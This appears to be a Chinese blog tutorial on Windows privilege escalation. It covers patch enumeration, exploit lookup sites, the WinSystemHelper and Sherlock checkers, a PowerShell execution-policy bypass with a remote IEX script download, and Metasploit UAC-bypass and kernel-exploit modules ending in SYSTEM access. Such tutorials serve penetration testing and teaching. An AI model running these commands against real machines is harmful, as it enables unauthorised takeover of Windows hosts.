Windows提权

  • 一、信息收集
  • 二、WinSystemHelper
  • 三、Sherlock
  • 四、MSF提权
  • 五、参考链接

一、信息收集

收集本机systeminfo中补丁信息

在提权辅助平台 https://i.hacking8.com/tiquan/ 中查询可利用exp

查询exp,选择对应的Exp下载运行

https://i.hacking8.com/
https://github.com/SecWiki/windows-kernel-exploits

提权Exp的运行方式,一般有以下几种:

1、直接执行exe程序,成功后会打开一个cmd窗口,在新窗口中权限就是system
2、在WebShell中执行exe程序,执行方式为xxx.exe whoami,成功后直接执行命令,再修改命令内容,可以执行不同的命令
3、利用MSF等工具
4、C++源码,Python脚本,PowerShell脚本等特殊方式

二、WinSystemHelper

使用WinSystemHelper检查可利用的漏洞。该工具适合在任何Windows服务器上进行已知提权漏洞的检测

https://github.com/brianwrf/WinSystemHelper
图片

上传WinSysHelper.bat、explt2003.txt、expgt2003.txt,运行bat查看结果

然后在可利用的Exp中任意下载一个并执行即可

三、Sherlock

Sherlock是在Windows下用于本地提权的PowerShell脚本
分析漏洞出漏洞后利用对应Exp即可

https://github.com/rasta-mouse/Sherlock
图片

启动Powershell
$ powershell.exe -exec bypass

本地加载脚本
$ Import-Module Sherlock.ps1

远程加载脚本
$ IEX (New-Object System.Net.Webclient).DownloadString(‘https://raw.githubusercontent.com/rasta-mouse/Sherlock/master/Sherlock.ps1’)

检查漏洞,Vulnstatus为Appears Vulnerable即存在漏洞
$ Find-AllVulns

四、MSF提权

Getsystem
meterpreter> getsystemBypassUACuse exploit/windows/local/bypassuac
use exploit/windows/local/bypassuac_injection
use windows/local/bypassuac_vbs
use windows/local/ask
meterpreter> background  # 后台session
msf> use exploit/windows/local/bypassuac
msf> set SESSION <session_id>

后台session时会返回session_id,如不清楚可以使用命令sessions -l
msf> run

内核提权
查询补丁

meterpreter> run post/windows/gather/enum_patches
[+] KB2999226 installed on 11/25/2020
[+] KB976902 installed on 11/21/2010

查询Exp

msf> use post/multi/recon/local_exploit_suggester
msf> set LHOST <攻击机IP>
msf> set SESSION <session_id>
msf> run

利用示例

msf> use exploit/windows/local/cve_2019_1458_wizardopium
msf> set SESSION <session_id>
msf> run
meterpreter> getuid
Server username: NT AUTHORITY\SYSTEM

五、参考链接

https://github.com/SecWiki/windows-kernel-exploitshttps://github.com/brianwrf/WinSystemHelperhttps://github.com/rasta-mouse/Sherlock

Windows提权流程及手法相关推荐

  1. windows提权速查流程

    windows提权速查流程 1.可利用漏洞信息收集 收集本机systeminfo中补丁信息 在提权辅助平台 https://i.hacking8.com/tiquan/ 中查询可利用exp 然后查询e ...

  2. Windows提权基本原理,各位表哥了解下!

    Windows提权基本原理 没有多少人谈论在Windows下提权,是一件让人遗憾的事!我想,没有人这么做的理由有以下几点: 在渗透测试项目中,客户需要的验证就是一个低权限shell. 在演示环境,你经 ...

  3. 系统提权之:Windows 提权

    郑重声明: 本笔记编写目的只用于安全知识提升,并与更多人共享安全知识,切勿使用笔记中的技术进行违法活动,利用笔记中的技术造成的后果与作者本人无关.倡导维护网络安全人人有责,共同维护网络文明和谐. Wi ...

  4. Windows提权--小迪权限提升--烂土豆--DLL劫持--udf提权

    目录 权限分类 针对环境 webshell权限 本地用户权限 提权方法 1.windows内核溢出漏洞(如何判断类型和利用) 2.数据库提权 Mysql Mssql oracle redis post ...

  5. 高收益的笨办法:暴破在Windows提权中的应用

    千辛万苦拿下的 webshell 不是 www-data 用户就是 networkservice 权限,要想拓展攻击面.扩大战果,提权,是必经之路,也是后渗透阶段成功的关键.windows 提权,我常 ...

  6. windows 提权 cve-2018-8897

    windows 提权 cve-2018-8897 影响范围:基本上是全版本 具体影响范围看详情:https://portal.msrc.microsoft.co - isory/CVE-2018-88 ...

  7. Windows提权基础:信息收集技巧及可用漏洞搜索

    本文收集整理一些跟提权紧密相关的信息收集技巧和方法,以及如何在kali中搜索可用的漏洞,最后整理了目前可供使用的一些漏洞对应msf下的模块以及操作系统可提权的版本. 0X00 Windows提权信息收 ...

  8. 使用MSF进行提权(windows提权、linux提权、wesng使用)

    文章目录 MSF Windows提权 反弹shell 提权 END推荐阅读 MSF Linux提权 反弹shell 补充wesng用法 Metasploit 是一个渗透框架,kali 内安装了,安装位 ...

  9. 张小白的渗透之路(十一)--windows提权详解

    windows基础命令 systeminfo | findstr OS **#获取系统版本信息** hostname **#获取主机名称** whomai /priv **#显示当前用户的安全特权** ...

最新文章

  1. NSException异常处理
  2. 线上分享 | 浅谈用户生命周期运营
  3. mvc的Controller返回值类型ActionResult详解
  4. Android Gallery控件使用方法详解
  5. 7.9模拟赛T1图的遍历(dfs)
  6. MFC之添加PNG,JPG图片
  7. javascript原型继承圣杯模式
  8. Linux数据链路层的包解析
  9. python图像标记工具怎么用_图像标注教程(使用LabelImg标注工具)
  10. 开普勒行星运动三定律
  11. python aic准则_赤池信息准则AIC,BIC
  12. 青年教师计算机培训美篇,小学生停课不停学美篇 小学生停课不停学美篇开头语...
  13. selenium模拟刷百度流量源码
  14. 解决docker nacos exited(137)
  15. 3-8 B: 分离LZY的字符串
  16. 计算机二级考试用户名怎么查,计算机二级考试成绩查询方法与具体步骤
  17. 基于GoLang的MMO游戏服务器(四)
  18. ADC和DAC的DNL和INL
  19. 01.基于Irises的springboot项目框架(简版)
  20. 02-网络为什么要分层

热门文章

  1. laravel没有vendor文件夹的解决方法
  2. Clipper库 | 类型和填充规则
  3. 对称密码体制与公钥密码体制
  4. 如何把极坐标化为直角坐标_如何把极坐标化为直角坐标
  5. 专题三:羊毛党络绎不绝,电商行业防不胜防
  6. cpri和10g-kr的关系?
  7. DDOS攻击检测和防护
  8. 把大脑从衰老的身体里分离出来?“长寿科技”让人类活200年不再遥远
  9. 用 ffmpeg 合并 m4s 音视频
  10. python 概率分布函数_如何在Python中实现这五类强大的概率分布